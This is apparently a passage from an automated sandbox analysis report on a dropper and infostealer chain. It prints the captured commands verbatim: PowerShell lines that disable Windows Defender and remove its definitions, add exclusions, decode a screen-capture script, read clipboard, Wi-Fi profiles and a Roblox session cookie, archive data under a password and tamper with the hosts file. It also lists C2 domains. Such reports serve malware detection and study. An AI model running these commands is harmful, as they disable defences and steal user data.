                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_006CA302 mov eax, dword ptr fs:[00000030h] 2_2_006CA302
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_006C652B mov eax, dword ptr fs:[00000030h] 2_2_006C652B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006CA302 mov eax, dword ptr fs:[00000030h] 3_2_006CA302
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006C652B mov eax, dword ptr fs:[00000030h] 3_2_006C652B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEF34F0 GetProcessHeap,5_2_00007FF67AEF34F0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (×7)
                                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug (×4)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEDD37C SetUnhandledExceptionFilter,5_2_00007FF67AEDD37C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF67AEDC910
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 5_2_00007FF67AEEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEEA684
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AEDD37C SetUnhandledExceptionFilter,6_2_00007FF67AEDD37C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AEDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF67AEDC910
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF67AEEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF67AEEA684
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8633028 IsProcessorFeaturePresent,00007FF8BFB919A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFB919A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8A8633028
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8755A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8A8755A24
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8B90E42B0 IsProcessorFeaturePresent,00007FF8BFB919A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFB919A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8B90E42B0

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'" (×2)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" (×2)
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe' (×3)
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' (×2)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()} (×2)
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Memory written: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe | Memory written: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe base: 400000 value starts with: 4D5A
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: debonairnukk.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: diffuculttan.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: effecterectz.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: deafeninggeh.biz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: immureprech.biz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bellflamre.click
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: pancakedipyps.click
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (×12)
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend (×12)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File written: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (×2)
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | Process created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe | Process created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaia